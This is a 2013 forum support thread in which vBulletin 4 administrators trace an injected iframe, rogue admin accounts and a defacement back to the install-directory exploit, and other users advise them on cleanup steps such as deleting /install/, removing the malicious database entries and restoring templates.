iframe injected into all templates
 

I have searched Google and have found a couple of forums suffering the same fate.

Today all of a sudden I noticed my pages loading slow so i looked at the code. I see a iframe at the bottom of all my pages:

My question is, how did it get there and how do i get rid of it?

--------------- Added [DATE]1378334265[/DATE] at [TIME]1378334265[/TIME] ---------------

I am running version 4.2.0 by the way.

You may want to check your templates and see if you were hacked and someone added it into your templates.

I checked the footer template but i dont know what to look for. I dont see the code just jump out.

Ok next step is to disable all plugins to see if it is coming from there.

Open your config.php and below<?php add this line:

So it looks like this:
Then check the page again and see if the iframe is still there.

If you have vBSEO installed this is very likely, could also be from the recently discovered install directory exploit we are unsure without actually investigating it ourselves.

Try running the queries listed on my blog post scroll down to find "Run the following Queries in phpMyAdmin" and do so - http://www.vbulletin.com/forum/blogs...vbulletin-site

Some basics:

1. Start off by replacing all files with 100% fresh vbulletin files of the exact same version.
2. Next run queries listed on the blog and investigate all that come up. If your not running a custom style then first delete any malicious plugins/templates and you can delete the default style and remake a new one (create a new style after removing the malicious plugins etc then delete the old one otherwise your primary is the default and it will not allow you to delete etc).
3. Next check filesystem - AdminCP > Maintenance > Diagnostics > Suspect File Versions and check to see what is listed, cross reference that via FTP and inspect file dates etc; Anything named odd should be investigated i.e. sexy.php, lol.php anything seemingly odd however not all hackers are so apparent they could have named it crontools.php or something you would if not 100% familiar with the product assume was a normal file so take your time checking.
4. Once you feel its clean, either create or login your Google webmaster tools and request the site be checked, once they verify its clean you're normally good to go.

Thanks Mike, I knew I seen that somewhere before, I just could not for the life of me remember where it was.

lol tis now bookmarked, I've been visiting profile on vb.com them finding all blog posts lololol :p.

Disabling Hooks does nothing, the iframe stays.

Superman I do not have vBSEO installed, However i will read the post you provided and report back.

Hmmm then it may be in the files somewhere, if it is not in the templates or plugins. Let us know what you come up with after following the post.

I have 4 new administrator in my admin group. All hackers.

Ouch, you need to find out how they got in.

Delete your install directory

If you had it in the past let us know, if you have never installed and used it then simply read my blog and run the queries listed from within phpmyadmin. If you are not the best at dealing with this type of stuff or using phpmyadmin then please post the results here and we'll try to assist you the best we can.

*Also who is your host? No name required I simply ask as some do backups free of charge some daily, some do hourly backups and they may have one handy and can simply restore the site to just before the time of being hacked - if that is the case you will lose all posts/info since said time but you'll go back to the point before infection where your safe to assume it's clean, then the objective at that time would be to rid yourself of any possible exploits such as removing the /install/ directory and checking for suspect file versions etc.

This username appeared 4 times in the admin group:

Th3H4ck

Note the userid's of those 4 accounts, you may need them for reference later but as soon as you write them down delete those admin accounts and as Zachery noted then me as well, delete the /install/ directly immediately if its present.

*Stop for one second though and reply to my backup question above ^ Do you have a recent backup? If so its better to restore and nip any possible exploits in the bud. If no backups then continue on investigating and clearing out any malicious code/files/other.

Edit: I'm taking the family out to dinner but will check this when I return as I have work to do tonight regardless ;).

Deleted the install directory but the iframe still remains. Also, i have no idea how i was hacked.

--------------- Added [DATE]1378338074[/DATE] at [TIME]1378338074[/TIME] ---------------

I do have backups provided by my host. However, they are probably to old. My forum is very busy. It really needs a daily backup.

You'll need to dig into the db, even though its a iframe, he could have it hidden in a base64 code thats decoding into the iframe.

This could be hidden in numerous tables of your db, datastore, plugins, styles etc.

I just installed the admincp firewall from here to block unknown ip addresses. I also have changed all my passwords. Now I am searching folder by folder for unknown php files. I will report if i find the source.

I wasnt suggesting files, i suggested in your db.

You make sure there are no unknown files in your vBulletin directory. You can use Maintenance --> Diagnostic --> Suspect File Versions to find these.

I found a table called "settings" in my database that contained only one entry. The iframe. Should i delete the entire table?

I dunno if I would delete it, maybe rename it to x_settings to make sure it is not supposed to be used by a mod or something. Then check your site and see if the iframe is still in the footer.

Oops, i didnt mean delete the table just the entry. I did that but the iframe remains. There are no more database entries with this hack that i can see.

vb4 uses setting, not settings, if the only entry in that table is the iframe, id nuke it after backing it up.

But he has to be calling that table & setting, you may have more to inspect than just that.

Just found it again in the "datastore" table. however its full of other settings. not sure how to remove it from there.

Try this https://vborg.vbsupport.ru/showthread.php?t=265866

Backup your db first.

Manually editing your datastore can be tricky.

I saw this addon many times but ignored it lol. what a dummy. I just installed it and ran it through scheduled tasks and it removed the iframe.

Thanks!

I still have no idea how I was hacked but apparently they couldn't do much. they didnt even edit my config file.

I changed all passwords
Installed admin panel firewall
and ran the hack fix

that seems to have done the trick.

Welcome

Glad to hear it is gone for now, hopefully it won't come back. Maybe they got one of the admin passwords or something, or it could have come from one of your mods, make sure hey are all up to date.

--------------- Added [DATE]1378344772[/DATE] at [TIME]1378344772[/TIME] ---------------

I would also recommend installing this mod, https://vborg.vbsupport.ru/showthrea...ght=vbsecurity

This is very troubling. I just dont see how they got in. However, if you do a search on those hackers nicknames on Google you will see other admin suffering the same fate today. I hope they find this thread.

--------------- Added [DATE]1378345346[/DATE] at [TIME]1378345346[/TIME] ---------------

Did you have your install directory still on the site, if you havent removed it already, remove it now.

--------------- Added [DATE]1378345705[/DATE] at [TIME]1378345705[/TIME] ---------------

Its best to htaccess protect your admincp & modcp after renaming them, not using a hack to do it.

I sure did. I only deleted install.php when i installed it, I deleted the whole directory today when someone mentioned it in this thread. Could that have been the problem?

Yes it could have been, to be 100% safe delete the entire directory. Some I've heard have only been deleting install.php and upgrade.php but no official statement yet as to what causes the exploit only a vague announcement and very late email regarding such.

So long as you delete the entire directory as you noted, you won't be subject to the exploit within.

Please note: If at anytime in the future an issue arises such as your admin account messing up or issues with cookies and you need to use tools.php to reset any of it, you will need to re-upload the /install/ directory (do not re-upload install.php or upgrade.php) then run tools.php to sort the issue then promptly delete the entire directory once again. <-- This is only required in the event you need to run tools.php as it requires the install directory to be present.

Hello,

I came to know of this exploit and looks like we too had this attack, we did the below:

1.Deleted install folder
2. Deleted suspicious admin user accounts
4. Refer thread - https://vborg.vbsupport.ru/showthread.php?t=301892 as mentioned there I didn't have any Iframe injection , but there was a line added in the "header" template of one of our custom style that reads as "Kindly delete "install" directory of your forums. Otherwise you will keep getting hacked" and the suspicious lines were removed.

Also we notice that few templates in the custom style has edit history that says "Edited by .." the suspicious admin accounts with time stamp in the past year 2010.

Is there any other precautions that need to be done. Am I currently still exploited? What are the other security measures that I need to do to protect my forums.

Hi everyone,

I am encountering a similar problem forums/forum.php. It seems only forum.php is affected.

This is what is displayed
"DzPhoeniX Here :P | PS :: Don't Mind Just kidding ;) "

Other pages are fine.

If I log in as administrator, forum.php loads correctly.

After some investigations in the admin logs, I found admin users created and logs show this:

https://vborg.vbsupport.ru/external/2013/09/13.jpg
https://vborg.vbsupport.ru/external/2013/09/14.jpg

I have already disabled those accounts but would like to know how to resolve the issue other than a database restore. It seems there could be a plugin or a template edit.

A search for "DzPhoenix" in templates led me to FORUMHOME which was blank except for the line above. I thus restored FORUMHOME back to its original state and everything seems fine again.

Is there anything else I should check on? I'm a bit worried about the references to plugins above and would appreciate any help on this.